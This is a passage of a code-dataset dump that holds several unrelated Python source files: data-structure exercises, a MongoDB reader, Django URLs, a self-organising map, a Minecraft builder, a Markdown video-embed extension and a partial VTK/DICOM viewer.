enumerate(lines)]\r\nmaxRows = max(lines)\r\nfor i in range(m):\r\n    destination, source = map(int, sys.stdin.readline().split())  \r\n    merge(destination - 1, source - 1)\r\n    print(maxRows)\r\n    \r\n","sub_path":"datastructures/Week3/merging_tables.py","file_name":"merging_tables.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529911577","text":"from pymongo import MongoClient\nimport json\nHostName = '192.168.2.169'\n\ndef mongoconn():\n    db = MongoClient(HostName,27017)\n    my_set = db.MultiApp.test\n    return my_set\n\ndef ReadData(my_set):\n    j = 0\n    #n = 0\n    ViewName = None\n    for i in my_set.find():\n        ViewName = i.get(\"_id\")\n        k=i.get('states').get('views')\n        if(k!=[]):\n            for n in range(len(k)):\n                text = k[n].get('text')\n                KeyNode = {\n                    '_id': ViewName,\n                    'viewsnum':n,\n                    'text':text\n                }\n                print(KeyNode)\n                #n+=1\n    #break\n\n\n\n\nmyset = mongoconn()\nReadData(myset)","sub_path":"ExperiemtProject/ReadMongo.py","file_name":"ReadMongo.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"523610462","text":"\"\"\"Defines URL patterns for users\"\"\"\nfrom django.urls import path, include\n\nfrom . import views\n\napp_name = 'users'\n\nurlpatterns = [\n\t# Include default auth urls.\n    # http://localhost:8000/users/login/ (users.urls.py & login view)\n\tpath('', include('django.contrib.auth.urls')),\n    # Registration page.\n    # http://localhost:8000/users/register/\n\tpath('register/', views.register, name='register'),\n]\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"219368932","text":"import turtle\nwn = turtle.Screen()\nwn.bgcolor(\"white\")\nbob = turtle.Turtle()\n\n\ndef ex_thirteen(t, n):\n    t.speed(0)\n    for i in range(n):\n        t.penup()\n        deg = 360 / n\n        t.lt(deg)\n        t.fd(100)\n        t.stamp()\n        t.back(100)\n\n\ndef ex_fourteen():\n    print(\"bale\", \"turn\", \"dole\", \"nest\")\n\n\ndef ex_fifteen():\n    print(\"pythons,\", \"no it is a boa,\", \"No\")\n\n\n# ex_thirteen(bob, 1000)\n# ex_fourteen()\n# ex_fifteen()\n\n\nwn.mainloop()\n","sub_path":"3.8_excercises.py","file_name":"3.8_excercises.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73951805","text":"# Linked lists are structures where each node or object in the list is pointing\n# to another node in the list. Since they are referenced by pointers to other objects\n# in the list, they have some advantages/disadvantages over arrays. Nodes in the linked\n# list are not accessible through indices, so they have a linear lookup time. However,\n# this allows them to be stored apart in memory rather than as a sequential block.\n#\n# Built-in list functions and Python's deque trivialize the implementation of linked\n# lists in Python, but this remains a good pedagogical exercise. This linked list is\n# implemented as a doubly linked list, with head, tail, next, and previous pointers. 
- Luan Pham 2018\n\n# The linked list is comprised of nodes, an abstraction of a connected object.\nclass node:\n\n    def __init__(self, data, next, prev): # initializer/constructor\n        self.data = data # data stored in the node\n        self.next = next # pointer to the next node\n        self.prev = prev # pointer to the previous node\n\n    # some getters and setters, apparently not as important in python (no private constructors anyway)\n    def get_data(self):\n        return self.data\n\n    def set_data(self, data):\n        self.data = data\n\n    def get_next(self):\n        return self.next\n\n    def get_prev(self):\n        return self.prev\n\n    def set_next(self, Node):\n        self.next = Node\n\n    def print_node(self):\n        print(self.data)\n\nclass linked_list:\n\n    def __init__(self): # initializer/constructor\n        self.head = None\n        self.tail = None\n        self.size = 0\n\n    def prepend(self, data): # adds a node to the beginning of the linked list\n        # creates a node with parameterized data\n        new_node = node(data, next = None, prev = None)\n        if self.size == 0: # if the linked list is empty, everything points to the new node\n            self.tail = self.head = new_node\n        else:\n            self.head.prev = new_node # former head prev points to new node\n            new_node.next = self.head # new node next points to the former head\n            self.head = new_node # assigns the head pointer to the new node\n        self.size += 1\n\n    def append(self, data): # adds a node to the end of the linked list\n        # creates a node with parameterized data\n        new_node = node(data, next = None, prev = None)\n        if self.size == 0: # if the linked list is empty, everything points to the new node\n            self.head = self.tail = new_node\n        else:\n            new_node.prev = self.tail # new node previous points to former tail\n            self.tail.next = new_node # former tail next points to the new node\n            self.tail = new_node # tail pointer reassigned\n        self.size += 1\n\n    def remove(self, data):\n        if self.size == 0:\n            raise IndexError(\"This list is empty!\")\n        current = self.head\n        counter = 0\n        while current:\n            if current.data == data:\n                if self.size == 1: # exit when we get a last match to avoid pointer issues\n                    self.head = self.tail = current.next = current.prev = None\n                    self.size -=1\n                    return\n                counter +=1\n                self.size -=1\n                if current.prev:\n                    current.prev.next = current.next # unlink from the previous node\n                else:\n                    self.head = current.next # removed node was the head\n                if current.next:\n                    current.next.prev = current.prev # unlink from the following node\n                else:\n                    self.tail = current.prev # removed node was the tail\n\n            current = current.next\n\n        print(\"%s instance(s) of %s removed!\" % (counter, data))\n\n    def contains(self, data):\n        if self.size == 0:\n            raise IndexError(\"This list is empty!\")\n        current = self.head\n        while current:\n            if current.data == data:\n                return True\n            current = current.next\n        return False\n\n\n    def print_list(self):\n        if self.size == 0:\n            raise IndexError(\"This list is empty!\")\n        current = self.head #start at the beginning\n        while current:\n            print(current.data, end = \" \")\n            current = current.next #moves to the next node by reassigning pointer\n","sub_path":"python/linked-list.py","file_name":"linked-list.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29423138","text":"from mcpi.minecraft import Minecraft\nimport shapes\nfrom math import ceil\n\ndef main(place):\n    mc=Minecraft.create(place,4711)\n    x,y,z=mc.player.getPos()\n    mc.setBlocks(x-5,y,z-20,x+5,y+5,z-8,0)\n    shapes.sphere(mc,x,y,z-15,5,5,5,80,0,4,4,4,0.5,1)\n    shapes.cylinder(mc,x,y,z-10,3,3,1,shapes.XY,80)\n    shapes.cylinder(mc,x,y,z-10,2,2,1,shapes.XY,0)\n    height=0\n    nx,ny,nz=x,y-1,z-15\n    clear=True\n    while 
clear:\n height+=1\n clearpos=0\n pos=[(0,0),(5,5),(-5,5),(-5,-5),(5,-5)]\n for xmod,zmod in pos:\n if mc.getBlock(xmod+nx,ny-height,zmod+nz) in [0,8,9,10,11,31,37,38,39,40,65,78,102,107,]:\n clearpos+=1\n if clearpos==0:\n clear=False\n shapes.cylinder(mc,x,y-1-ceil(height/2),z-15,5,ceil(height/2),5,shapes.XZ,80)\n mc.setBlocks(x-2,y-1-height,z-11,x+2,y-1,z-9,80)\n #mc.setBlocks(x-5,y-1,z-20,x+5,y-1,z-8,80)\n\nif __name__=='__main__':\n main(\"127.0.0.1\")\n","sub_path":"newigloo.py","file_name":"newigloo.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58273595","text":"# Copyright 2018 Contributors to Hyperledger Sawtooth\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -----------------------------------------------------------------------------\n\"\"\"Implements the CONFIRM_ADD_ROLE_ADMIN message\nusage: rbac.role.admin.confirm.create()\"\"\"\nimport logging\nfrom rbac.common import addresser\nfrom rbac.common.crypto.keys import Key\nfrom rbac.common.proposal.proposal_message import ProposalMessage\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass ConfirmAddRoleAdmin(ProposalMessage):\n \"\"\"Implements the CONFIRM_ADD_ROLE_ADMIN message\n usage: rbac.role.admin.confirm.create()\"\"\"\n\n @property\n def message_action_type(self):\n \"\"\"The action type performed by this message\"\"\"\n return addresser.MessageActionType.CONFIRM\n\n @property\n def message_subaction_type(self):\n \"\"\"The subsequent action performed or proposed by this message\"\"\"\n return addresser.MessageActionType.ADD\n\n @property\n def message_object_type(self):\n \"\"\"The object type this message acts upon\"\"\"\n return addresser.ObjectType.ROLE\n\n @property\n def message_relationship_type(self):\n \"\"\"The relationship type this message acts upon\"\"\"\n return addresser.RelationshipType.ADMIN\n\n def make_addresses(self, message, signer_keypair):\n \"\"\"Makes the appropriate inputs & output addresses for the message\"\"\"\n if not isinstance(message, self.message_proto):\n raise TypeError(\"Expected message to be {}\".format(self.message_proto))\n if not isinstance(signer_keypair, Key):\n raise TypeError(\"Expected signer_keypair to be provided\")\n\n signer_admin_address = addresser.role.admin.address(\n message.role_id, signer_keypair.public_key\n )\n\n relationship_address = addresser.role.admin.address(\n message.role_id, message.user_id\n )\n\n proposal_address = self.address(\n object_id=message.role_id, target_id=message.user_id\n )\n\n inputs = [signer_admin_address, proposal_address]\n outputs = [proposal_address, relationship_address]\n\n return inputs, outputs\n","sub_path":"rbac/common/role/confirm_admin.py","file_name":"confirm_admin.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"130043127","text":"from envs import env_for_training as env\nfrom simulator import simulate_Interceptor_V2 
as sim_env\nfrom savers.debug_logger import create_logger\nfrom envs.env_for_training import Init, Draw, Game_step\n\n# import Interceptor_V2 as env\n# from Interceptor_V2 import Init, Draw, Game_step\n\nlogger = create_logger(\"smart_player\")\ndebug = logger.debug\n\n\ndef choose_action(steps_to_sim):\n SHOOT = 3\n WAIT = 1\n diff_score = simulate_shoot_score(steps_to_sim)\n # if it worth shooting, shoot:\n if diff_score > 0:\n debug(\"shoot!\")\n action_button = SHOOT\n else:\n debug(\"skip\")\n action_button = WAIT\n return action_button\n\n\ndef simulate_shoot_score(steps_to_sim):\n \"\"\"\n :param steps_to_sim: how many step until end of game (1000-stp)\n :return: predicted_shoot_score - predicted_wait_score\n \"\"\"\n SHOOT = 3\n WAIT = 1\n MAX_STEPS = 300\n actions = [SHOOT, WAIT]\n scores = []\n steps_to_sim = min(steps_to_sim, MAX_STEPS)\n for action_button in actions:\n # init new simulate game\n sim_env.Simulate(env.world, env.turret, env.rocket_list, env.interceptor_list, env.city_list,\n env.explosion_list)\n # act\n sim_env.simulate_game_step(action_button)\n\n # peace steps until end of game\n for i in range(steps_to_sim):\n _, _, _, _, score = sim_env.simulate_peace_step()\n # last step : save score in end of peace game\n scores.append(score)\n\n shoot_score = scores[0] - scores[1]\n # debug\n # if shoot_score != 0:\n # debug(f\"steps_to_simulate = {steps_to_sim}\\n diff={shoot_score}\")\n return shoot_score\n\n\nif __name__ == \"__main__\":\n Init()\n max_stp = 1000\n init_stp = 8\n\n # move turent to best angle\n for stp in range(init_stp):\n action_button = 2\n r_locs, i_locs, c_locs, ang, score = Game_step(action_button)\n\n # shoot only if it's worth it\n for stp in range(stp, max_stp):\n action_button = choose_action(max_stp - stp)\n r_locs, i_locs, c_locs, ang, score = Game_step(action_button)\n debug(f\"{stp}.score = {score}\")\n\n if action_button == 3 or stp % 1 == 0:\n Draw()\n","sub_path":"simulator/non_ai_smart_player.py","file_name":"non_ai_smart_player.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"541709167","text":"import numpy as np\nimport random\n\n\nclass SOM():\n\n def __init__(self, nNodes, inputDim, nClass, eta=0.2):\n self.nNodes = nNodes\n self.weights = None\n self.eta = eta\n self.inputDim = inputDim\n self.nClass = nClass\n\n def initWeights(self):\n self.weights = np.zeros((self.nNodes, self.inputDim))\n for i in range(self.nNodes):\n self.weights[i][:] = np.random.random(self.inputDim)\n return self.weights\n\n def euclidianDist(self, pattern):\n dBest = 10000\n for i in range(self.weights.shape[0]):\n d = np.transpose(\n pattern-self.weights[i][:])@(pattern-self.weights[i][:])\n if d < dBest:\n dBest = d\n iBest = i\n return iBest\n\n def neighbourhood(self, index, epoch, epochs):\n if epoch/epochs <= 0.1:\n dist = 25\n elif epoch/epochs <= 0.25:\n dist = 10\n elif epoch/epochs <= 0.75:\n dist = 5\n else:\n dist = 1\n\n neighbours = np.linspace(\n index-dist, index+dist, 2*dist+1)\n neighbours = np.where(neighbours < 0, neighbours + 100, neighbours)\n neighbours = np.where(neighbours > 99, neighbours - 100, neighbours)\n return neighbours\n\n def weightsUpdate(self, pattern, neighbours):\n for i in neighbours:\n self.weights[int(i)][:] = self.weights[int(i)][:] + \\\n self.eta*(pattern-self.weights[int(i)][:])\n return self.weights\n\n\ndef main():\n\n ######## Import animal data ############\n data = []\n with 
open('/home/andrej/school/ann-course/lab2/animals.dat', 'r') as f:\n d = f.readlines()\n for i in d:\n k = i.rstrip().split(\",\")\n data.append([int(i) for i in k])\n data = np.array(data, dtype='O')\n animalData = np.reshape(data, (32, 84))\n\n ######### Import animal names ############\n data = []\n with open('/home/andrej/school/ann-course/lab2/animalnames.txt', 'r') as f:\n d = f.readlines()\n for i in d:\n k = i.rstrip(\"'\").split()\n data.append([i for i in k])\n data = np.array(data, dtype='O')\n animalNames = data\n animalNames = np.squeeze(animalNames)\n ########################################\n\n ####### init som and weights ###########\n som = SOM(nNodes=100, inputDim=84, nClass=32)\n weights = som.initWeights()\n epochs = 20\n ######################################\n\n ######## Training ###################\n for epoch in range(epochs):\n for i in range(32):\n iBest = som.euclidianDist(animalData[i][:])\n # print(iBest)\n neighbours = som.neighbourhood(iBest, epoch, epochs)\n # print(neighbours)\n som.weightsUpdate(animalData[i][:], neighbours)\n ######################################\n\n ########## Testing ##################\n winnerIndexes = []\n for i in range(32):\n iBest = som.euclidianDist(animalData[i][:])\n winnerIndexes.append(iBest)\n ######################################\n\n animalNames = np.ndarray.tolist(animalNames)\n animalNames = [x for _, x in sorted(zip(winnerIndexes, animalNames))]\n print(animalNames)\n winnerIndexes = sorted(winnerIndexes)\n # print(winnerIndexes)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"RBF, CL, SOM/som_animals.py","file_name":"som_animals.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"12610386","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore\nimport os\n\nSERVER_PORT = 502\nCLIENT_ADDR = \"127.0.0.1\"\nCLIENT_PORT = 502\nSEGMAC = \"241.0.0.1\"\nSCMAC = \"0.0.0.241.0.0.0.1\"\nPROTO_ID = 0\n\nFREQ_ADDR = 0x00F5\nTEMP_UPPER = 0x4100\nTEMP_LOWER = 0x4101\nMOISTURE_UPPER = 0x4102\nMOISTURE_LOWER = 0x4103\nEARTH_TEMP_UPPER = 0x4104\nEARTH_TEMP_LOWER = 0x4105\nEARTH_MOISTURE_UPPER = 0x4106\nEARTH_MOISTURE_LOWER = 0x4107\nCO2_UPPER = 0x4108\nCO2_LOWER = 0x4109\nILLUM_UPPER = 0x410A\nILLUM_LOWER = 0x410B\nCOMMAND_ADDR = 0x2100\n\nINI_FILE = \".\" + os.sep + \"config.ini\"\n\ndef loadConfig():\n\tglobal SERVER_PORT, CLIENT_ADDR, CLIENT_PORT\n\tsettings = QtCore.QSettings(INI_FILE, QtCore.QSettings.IniFormat)\n\tSERVER_PORT = int(settings.value(\"server-port\", SERVER_PORT).toString())\n\tCLIENT_ADDR = settings.value(\"client-addr\", CLIENT_ADDR).toString()\n\tCLIENT_PORT = int(settings.value(\"client-port\", CLIENT_PORT).toString())","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269087948","text":"memory = []\r\nmask = ''\r\n\r\ndef find(a, m):\r\n # address and mask \r\n a = bin(int(a))\r\n a = a.replace('b', '0' * (37 - len(a)))\r\n lm = list(m)\r\n la = list(a)\r\n for i in range(len(lm)):\r\n if lm[i] != '0':\r\n la[i] = lm[i]\r\n \r\n # number of binary numbers\r\n a = ''.join(la)\r\n bn = a.count('X')\r\n\r\n mx = ''\r\n for x in range(bn):\r\n mx += '1'\r\n \r\n mx = int(mx, 2)\r\n\r\n # all bi possibilities\r\n ab = []\r\n for i in range(mx + 1):\r\n bi = bin(int(i))[2:].zfill(bn)\r\n bi = list(bi)\r\n ab.append(bi)\r\n \r\n # all addresses\r\n 
aa = []\r\n for q in ab:\r\n ind = 0\r\n dup = list(a)\r\n a = list(a)\r\n for x in range(len(a)):\r\n if a[x] == 'X':\r\n dup[x] = q[ind]\r\n ind += 1\r\n aa.append(int((''.join(dup)), 2))\r\n return aa\r\n\r\nfor line in open(\"inputs/day14.txt\"):\r\n line = line.rstrip('\\n')\r\n key, val = line.split(' = ')\r\n if key == 'mask':\r\n mask = val\r\n print(mask)\r\n else:\r\n mem = key[4 : -1]\r\n add = find(mem, mask)\r\n dup = False\r\n loop = 0\r\n for x in memory:\r\n if x[0] in add:\r\n index = add.index(x[0])\r\n del add[index]\r\n memory[loop][1] = val\r\n loop += 1\r\n for x in add:\r\n memory.append([x, val])\r\n\r\nsums = 0\r\nfor x in memory:\r\n sums += int(x[1])\r\n\r\nprint(sums)\r\n\r\n# memory = []\r\n# mask = ''\r\n\r\n# for line in open(\"inputs/day14.txt\"):\r\n# line = line.rstrip('\\n')\r\n# key, val = line.split(' = ')\r\n# if key == 'mask':\r\n# mask = val\r\n# else:\r\n# val = bin(int(val))\r\n# val = val.replace('b', '0' * (37 - len(val)))\r\n# lm = list(mask)\r\n# lv = list(val)\r\n# for i in range(len(lm)):\r\n# if lm[i] != 'X':\r\n# lv[i] = lm[i]\r\n# mask = ''.join(lm)\r\n# val = ''.join(lv)\r\n# mem = key[4 : -1]\r\n# dup = False\r\n# loop = 0\r\n# for x in memory:\r\n# if x[0] == mem:\r\n# dup = True\r\n# memory[loop][1] = val\r\n# loop += 1\r\n# if dup == False:\r\n# memory.append([mem, val])\r\n\r\n# sums = 0\r\n# for x in memory:\r\n# sums += int(x[1], 2)\r\n \r\n# print(sums)","sub_path":"2020/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"344515906","text":"#!/usr/bin/env python\n\nimport zmarkdown\nfrom zmarkdown.util import etree\nfrom zmarkdown.blockprocessors import BlockProcessor\nimport re\n\n\nclass VideoExtension(zmarkdown.Extension):\n def __init__(self, js_support=False, **kwargs):\n zmarkdown.Extension.__init__(self)\n\n self.config = {\n 'dailymotion_width': ['480', 'Width for Dailymotion videos'],\n 'dailymotion_height': ['270', 'Height for Dailymotion videos'],\n 'vimeo_width': ['500', 'Width for Vimeo videos'],\n 'vimeo_height': ['281', 'Height for Vimeo videos'],\n 'yahoo_width': ['624', 'Width for Yahoo! videos'],\n 'yahoo_height': ['351', 'Height for Yahoo! 
videos'],\n            'youtube_width': ['560', 'Width for Youtube videos'],\n            'youtube_height': ['315', 'Height for Youtube videos'],\n            'ina_width': ['620', 'Width for INA videos'],\n            'ina_height': ['349', 'Height for INA videos'],\n            'jsfiddle': [False, ''],\n            'jsfiddle_width': ['560', 'Width for jsfiddle'],\n            'jsfiddle_height': ['560', 'Height for jsfiddle'],\n        }\n\n        self.config['youtube_short_width'] = self.config['youtube_width']\n        self.config['youtube_short_height'] = self.config['youtube_height']\n\n        # Override defaults with user settings\n        for key, value in kwargs.items():\n            self.setConfig(key, value)\n\n        if js_support:\n            self.setConfig(\"jsfiddle\", True)\n\n    def add_inline(self, md, name, klass, pat):\n        RE = r'(^|\\n)!\\(' + pat + r'\\)'\n        md.parser.blockprocessors.add(\"video-\" + name,\n                                      klass(md, RE,\n                                            self.config[\"{}_width\".format(name)][0],\n                                            self.config[\"{}_height\".format(name)][0]),\n                                      \">reference\")\n\n    def extendZMarkdown(self, md, md_globals):\n        self.add_inline(md, 'dailymotion', Dailymotion,\n                        r'https?://www\\.dailymotion\\.com/video/(?P<dailymotionid>[a-z0-9]+)(_[\\w\\-]*)?')\n        self.add_inline(md, 'vimeo', Vimeo,\n                        r'https?://(www.|)vimeo\\.com/(?P<vimeoid>\\d+)\\S*')\n        self.add_inline(md, 'yahoo', Yahoo,\n                        r'https?://screen\\.yahoo\\.com/.+/?')\n        self.add_inline(md, 'youtube', Youtube,\n                        r'https?://(www\\.)?youtube\\.com/watch\\?\\S*v=(?P<youtubeid>\\S[^&/]+)'\n                        r'(?P<channel>&ab_channel=[\\w%]+)?')\n        self.add_inline(md, 'youtube_short', Youtube,\n                        r'https?://youtu\\.be/(?P<youtubeid>\\S[^?&/]+)?')\n        self.add_inline(md, 'ina', Ina,\n                        r'https?://www\\.ina\\.fr/video/(?P<inaid>[A-Z0-9]+)/([\\w\\-]*)\\.html')\n        if self.config[\"jsfiddle\"][0]:\n            self.add_inline(md, 'jsfiddle', JsFiddle,\n                            r'https?://(www.|)jsfiddle\\.net(/(?P<jsfiddleuser>\\w+))?/'\n                            r'(?P<jsfiddleid>\\w+)(/(?P<jsfiddlerev>[0-9]+)|)/?')\n\n\nclass VideoBProcessor(BlockProcessor):\n    def __init__(self, md, patt, width, height):\n        BlockProcessor.__init__(self, md.parser)\n        self.md = md\n        self.width = width\n        self.height = height\n        self.RE = re.compile(patt)\n\n    def test(self, parent, block):\n        return bool(self.RE.search(block))\n\n    def run(self, parent, blocks):\n        m = self.RE.search(blocks[0])\n\n        el = self.handle_match(m)\n        if el is None:\n            return False\n\n        block = blocks.pop(0)\n        before = block[:m.start()]\n        after = block[m.end():]\n\n        if before:  # pragma: no cover\n            # This should never occur because the regex requires that the expression starts the block.\n            # Do not raise an exception because an exception should never be generated here.\n            self.md.parser.parseBlocks(parent, [before])\n\n        parent.append(el)\n\n        if after:\n            blocks.insert(0, after)\n\n    @staticmethod\n    def extract_url(_):  # pragma: no cover\n        # Should be overridden in sub-class\n        return \"\"\n\n    def handle_match(self, m):\n        url = self.extract_url(m)\n        if url is None:\n            return None\n        return self.render_iframe(url, self.width, self.height)\n\n    @staticmethod\n    def render_iframe(url, width, height):\n        iframe = etree.Element('iframe')\n        iframe.set('width', width)\n        iframe.set('height', height)\n        iframe.set('src', url)\n        iframe.set('allowfullscreen', 'true')\n        iframe.set('frameborder', '0')\n        return iframe\n\n\nclass Dailymotion(VideoBProcessor):\n    @staticmethod\n    def extract_url(m):\n        return 'https://www.dailymotion.com/embed/video/%s' % m.group('dailymotionid')\n\n\nclass Vimeo(VideoBProcessor):\n    @staticmethod\n    def extract_url(m):\n        return 'https://player.vimeo.com/video/%s' % m.group('vimeoid')\n\n\nclass Yahoo(VideoBProcessor):\n    @staticmethod\n    def extract_url(m):\n        return m.string + '?format=embed&player_autoplay=false'\n\n\nclass 
Youtube(VideoBProcessor):\n    @staticmethod\n    def extract_url(m):\n        return 'https://www.youtube.com/embed/%s' % m.group('youtubeid')\n\n\nclass Ina(VideoBProcessor):\n    @staticmethod\n    def extract_url(m):\n        return 'http://player.ina.fr/player/embed/%s/1/1b0bd203fbcd702f9bc9b10ac3d0fc21/560/315/1/148db8' % m.group(\n            'inaid')\n\n\nclass JsFiddle(VideoBProcessor):\n    @staticmethod\n    def extract_url(m):\n        fields = (m.group('jsfiddleuser'), m.group('jsfiddleid'), m.group('jsfiddlerev'))\n        if fields[0] is not None and fields[2] is None:\n            # Only two parts; the revision could be hiding in the id pattern\n            try:\n                int(fields[1])\n                # It is a revision!\n                fields = (None, fields[0], fields[1])\n            except ValueError:\n                pass\n        if fields[0] is not None and fields[1] is not None and fields[2] is None:\n            # Base version link, should not be allowed because content can be changed externally\n            return None\n        base = \"https://jsfiddle.net/{}/embedded/result,js,html,css/\"\n        return base.format(\"/\".join([t for t in fields if t is not None]))\n\n\ndef makeExtension(*args, **kwargs):\n    return VideoExtension(*args, **kwargs)\n","sub_path":"zmarkdown/extensions/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"539100876","text":"import vtk\nimport numpy as np\nimport pydicom as dicom\nimport platform\nimport os\nimport time\nimport vtk.util.numpy_support as vtknp\nimport glob\nimport re\n\n\nminValGr = 0.0 # scaling of the gray values\nmaxValGr = 255.0\ndiffValGr = maxValGr - minValGr\n\ncountList = []\ncount = -1\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef close_window(iren):\n    render_window = iren.GetRenderWindow()\n    render_window.Finalize()\n    iren.TerminateApp()\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef showAxes():\n    axes = vtk.vtkAxesActor()\n    widget = vtk.vtkOrientationMarkerWidget()\n    widget.SetOrientationMarker(axes)\n    widget.SetInteractor(iren)\n    widget.SetEnabled(1)\n    widget.InteractiveOn()\n\n    return(axes, widget)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef timer_callback(obj, event):\n    global updateVectors, numTimeSteps, numSlices, count, minDiffAtPos\n\n    count = (count + 1) % numTimeSteps\n\n    for actImage in range(numSlices):\n        images[actImage].GetPointData().SetScalars(listOfVTKDataLists[actImage][updateVectors[actImage][count]])\n\n    iren.Render()\n\n    actMesh[...] 
= displacements[timeVectors[minDiffAtPos][updateVectors[minDiffAtPos][count]]]\n    polydata.Modified()\n\n    iren.GetRenderWindow().Render()\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef calcUpdateVector(timeVectors, pos):\n    numSlices = len(timeVectors)\n    numTimeSteps = len(timeVectors[pos])\n\n    updateVectors = np.ndarray((numSlices, numTimeSteps), int)\n\n    for i in range(numSlices):\n        lowerIndex = 0\n        for j in range(numTimeSteps):\n            needVal = True\n            if i == pos:\n                updateVectors[i][j] = j\n                continue\n            else:\n                actTime = timeVectors[pos][j]\n                upperIndex = len(timeVectors[i])\n\n                lastDiff = float('Inf')\n\n                for k in range(lowerIndex, upperIndex):\n                    actDiff = int(abs(actTime - timeVectors[i][k]))\n\n                    if actDiff == 0:\n                        updateVectors[i][j] = k\n                        needVal = False\n                        break\n\n                    if actDiff < lastDiff:\n                        lastDiff = actDiff\n                    else:\n                        updateVectors[i][j] = k - 1\n                        needVal = False\n                        break\n\n                    lowerIndex = k\n\n                if needVal:\n                    updateVectors[i][j] = k\n\n    return updateVectors\n\n\n\n# NOTE: body is currently identical to calcUpdateVector.\ndef DTWcalcUpdateVector(timeVectors, pos):\n    numSlices = len(timeVectors)\n    numTimeSteps = len(timeVectors[pos])\n\n    updateVectors = np.ndarray((numSlices, numTimeSteps), int)\n\n    for i in range(numSlices):\n        lowerIndex = 0\n        for j in range(numTimeSteps):\n            needVal = True\n            if i == pos:\n                updateVectors[i][j] = j\n                continue\n            else:\n                actTime = timeVectors[pos][j]\n                upperIndex = len(timeVectors[i])\n\n                lastDiff = float('Inf')\n\n                for k in range(lowerIndex, upperIndex):\n                    actDiff = int(abs(actTime - timeVectors[i][k]))\n\n                    if actDiff == 0:\n                        updateVectors[i][j] = k\n                        needVal = False\n                        break\n\n                    if actDiff < lastDiff:\n                        lastDiff = actDiff\n                    else:\n                        updateVectors[i][j] = k - 1\n                        needVal = False\n                        break\n\n                    lowerIndex = k\n\n                if needVal:\n                    updateVectors[i][j] = k\n\n    return updateVectors\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef readFilesToDicomArray(path, listOfSeries):\n    listOfDicomArrays = []\n    listOfPixelDims = []\n    listOfPixelSpacings = []\n    listOfPlaneShapes = []\n    listOfMaxCounts = []\n    listOfMatrices = []\n\n\n    dictFilesDCM = {}\n\n    for series in listOfSeries: # for each series folder\n        for dirName, subdirList, fileList in os.walk(path + series):\n            for filename in fileList:\n                if \".dcm\" in filename.lower():\n                    actDs = dicom.read_file(os.path.join(dirName, filename))\n                    pos = str(actDs.ImagePositionPatient + actDs.ImageOrientationPatient)\n\n                    if (pos not in dictFilesDCM):\n                        dictFilesDCM[pos] = {}\n                    dictFilesDCM[pos][actDs.InstanceNumber] = os.path.join(dirName, filename)\n\n    minDiffAtPos = -1\n    minDiff = float('Inf')\n\n    timeVectors = []\n\n\n    for actPos, actDict in dictFilesDCM.items(): # for each slice position\n        sortEntries = sorted(actDict)\n\n        actTimeVector = []\n        timeVectors.append(actTimeVector)\n\n        first = True\n        actIndex = 0\n\n        for actFile in sortEntries: # for each individual image\n\n            actDicom = dicom.read_file(actDict[actFile])\n\n            if first: # organize the metadata + create ArrayDicom\n                first = False\n\n                winCen = actDicom.WindowCenter\n                winWidth = actDicom.WindowWidth\n                resIntercept = actDicom.RescaleIntercept\n                resSlope = actDicom.RescaleSlope\n\n                ConstPixelDims = (len(sortEntries),\n                                  int(actDicom.Rows),\n                                  int(actDicom.Columns))\n\n                planeShape = (int(actDicom.Rows), int(actDicom.Columns), 1)\n\n                ConstPixelSpacing = (float(actDicom.PixelSpacing[0]),\n                                     float(actDicom.PixelSpacing[1]),\n                                     float(actDicom.SliceThickness))\n\n                position = actDicom.ImagePositionPatient\n                orientation = actDicom.ImageOrientationPatient\n\n                xdir = orientation[0:3]\n                
